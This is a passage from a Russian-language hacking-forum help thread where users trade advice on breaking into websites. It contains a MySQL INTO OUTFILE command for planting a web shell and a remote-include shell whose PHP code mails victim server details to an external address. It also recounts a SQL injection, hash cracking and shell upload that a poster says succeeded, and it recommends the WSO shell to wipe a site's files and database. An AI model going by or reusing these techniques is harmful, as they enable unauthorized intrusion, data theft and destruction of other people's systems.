[Задай Вопрос - Получи Ответ]

Discussion in 'Веб-уязвимости' started by Rombl4, 17 Nov 2008.

  1. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Для Windows - бэк-слэшами.

    Ещё через URL-encode можно попробовать.
     
    _________________________
  2. Kevin

    Kevin New Member

    Joined:
    28 Mar 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Нашел админку phpMyAdmin (Version information: 3.4.10.2), крутится на Apache/2.2.3, CentOS.
    Есть доступ к root на phpMyAdmin.
    Как получить шелл?
    Смотрел видео типа: http://youtu.be/fiIO_X0gJoU
    Пробовал не выходит. В туториале все шаманится на Xampp под виндой.
    Очевидно нету прав на запись в директорию или не правильно указываю путь.

    Code:
    SELECT * FROM shell INTO OUTFILE '/var/www/shell.php';
    Результат:
    Code:
    #1 - Can't create/write to file '/var/www/shell.php' (Errcode: 13)
    Ткните носом, плиз.
     
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    !!!!

     
    _________________________
  4. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    417
    Likes Received:
    32
    Reputations:
    1
    Вопрос по Bitrix:

    В БД в таблице юзер есть колонка "CHECKWORD"
    На сайте Битрикса в хелпе прочел что эта колонка содержит код для восстановления пароля.
    Насколько я понял - с помощю этого кода , как бы, можно поменять пасс. Зашел в восстановление пасса. Там есть поле для этого кода. Ввел. Но пишет что код не верный.
    Как же все таки работает восстановление в Битрикс? Кто знает? Может все таки нужно вначале нажимать на ссылку для восстановления пароля для отправки на мыло и тогда генерится новый код (а этот уже не рабочий, устаревший)? Или еще какая мутка?
     
  5. Martyn911

    Martyn911 New Member

    Joined:
    10 Jan 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте, есть у меня такой инклуд
    include("http://www.mysite.ru/shell.php");

    Как мне определить на каких сайтах он работает, пробовал в файл shell.php засунуть такой код

    $ip=($_SERVER['SERVER_ADDR']);
    $host=($_SERVER['SERVER_NAME']);
    mail("[email protected]", "$host", "$host\n$ip");

    но приходят данные сайта mysite.ru, а мне нужно удаленного(на котором он подключен)?
     
  6. Martyn911

    Martyn911 New Member

    Joined:
    10 Jan 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    никто не знает или написал очень запутано?
     
  7. gold52

    gold52 Member

    Joined:
    20 Jan 2013
    Messages:
    83
    Likes Received:
    12
    Reputations:
    5
    Нашёл на сайте SQL-inj.
    Данных для авторизации в админке там не было, но была таблица mysql.
    Разхешил пасс и попал в phpmyadmin(v 3.5.7).
    Остаётся только залить шелл, но я не нашёл полного пути.
    При попытке спровоцировать ошибку в скрипте с SQL-inj происходит редирект на 404.
    Так же есть READ FILE.

    Server type: Apache/2.2.24 (FreeBSD) PHP/5.4.10 mod_ssl/2.2.24 OpenSSL/0.9.8q DAV/2 (Speed: 0.04)
    Version: PHP/5.4.10


    Собственно как можно раскрыть полный путь к сайту??
    М.б. в логах каких-нибудь прочитать??
     
    #487 gold52, 6 Oct 2013
    Last edited: 6 Oct 2013
  8. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359

    конфиги apache читай
     
    _________________________
  9. gold52

    gold52 Member

    Joined:
    20 Jan 2013
    Messages:
    83
    Likes Received:
    12
    Reputations:
    5
    можно по-подробней плз?
     
  10. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359
    Ты вообще в курсе что такое apache?

    Ищи либо /etc/apache2/apache2.conf либо /etc/httpd/httpd.conf
    возможно другое название файла, но это самые распространенные, у тебя скорее всего первый вариант будет.
    А там (в этом файле) ищи расположение директории с файлами веб-сервера.


    p.s. а вообще советую установить apache на виртуалке и разобраться в настройках.
     
    _________________________
  11. gold52

    gold52 Member

    Joined:
    20 Jan 2013
    Messages:
    83
    Likes Received:
    12
    Reputations:
    5
    Я читал через Havij.
    etc/passwd - всё ок
    /etc/apache2/apache2.conf и /etc/httpd/httpd.conf ничего не выводит
     
  12. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359
    Ты ручками научись сначала =)

    Что могу сказать, ищи конфиги, ищи! У phpmyadmin ищи, у всего что установлено ищи.
    стандарт проверь /var/www/index.php воображение включай и вперед.
     
    _________________________
  13. gold52

    gold52 Member

    Joined:
    20 Jan 2013
    Messages:
    83
    Likes Received:
    12
    Reputations:
    5
    Я же говорил, что там 404)) поэтому так))
    А с путём кажется что определился:

    Code:
    /usr/local/www/site.ru
    Только вот прав кажись нету ((

    UP:
    Нашёл на сервере phpinfo.
    Можно ли как-то найти папку с правами на запись, что бы шелл залить?

    UPPP:
    всё, залил. всем спс))

    PS Может кому пригодиться:
    расположение логов апача
     
    #493 gold52, 6 Oct 2013
    Last edited: 8 Oct 2013
  14. hahanovB

    hahanovB Active Member

    Joined:
    22 Jul 2013
    Messages:
    264
    Likes Received:
    244
    Reputations:
    2
    Подскажите шелл для удаления сайта.
     
  15. Logan22

    Logan22 Member

    Joined:
    11 Sep 2009
    Messages:
    119
    Likes Received:
    17
    Reputations:
    0
    Да в принципе можно тот же самый WSO.
    Через него удали все файлы на сервере и БД...
    Но рекомендую сделать dump всего =)
     
  16. rosty2008

    rosty2008 New Member

    Joined:
    22 Dec 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    А не подскажите есть ли какие нибудь уязвимости в instantCMS?
     
  17. BOSS

    BOSS Member

    Joined:
    15 Jun 2010
    Messages:
    86
    Likes Received:
    5
    Reputations:
    0
    у меня есть доступ к файлам хостинга, кроме папки home, где собственно и лежат все сайты, доступ к которым я и хочу получить
    У меня есть доступ к папкам [ boot ] [ dev ] [ etc ] [ lib ] [ lib32 ] [ lib64 ] [ media ]
    [ mnt ] [ opt ] [ proc ] [ root ] [ sbin ] [ sys ] [ tmp ] [ usr ] [ var ]
    есть ли от них смысл? Могу ли я покопавшись в этих файлах найти что-то полезное?
     
  18. KukMan

    KukMan New Member

    Joined:
    22 Feb 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Подскажите, а что, нет способа убрать суффикс в Local File Inclusion в PHP 5.3.3? Переполнение и нулевой байт не работают
     
  19. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    В какой таблице в джумле можно глянуть список администраторов? или где это вообще поссмотреть?
     
  20. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Code:
    select * from jos_users where usertype= 'Super Administrator';
    Joomla < 3.0
     
    _________________________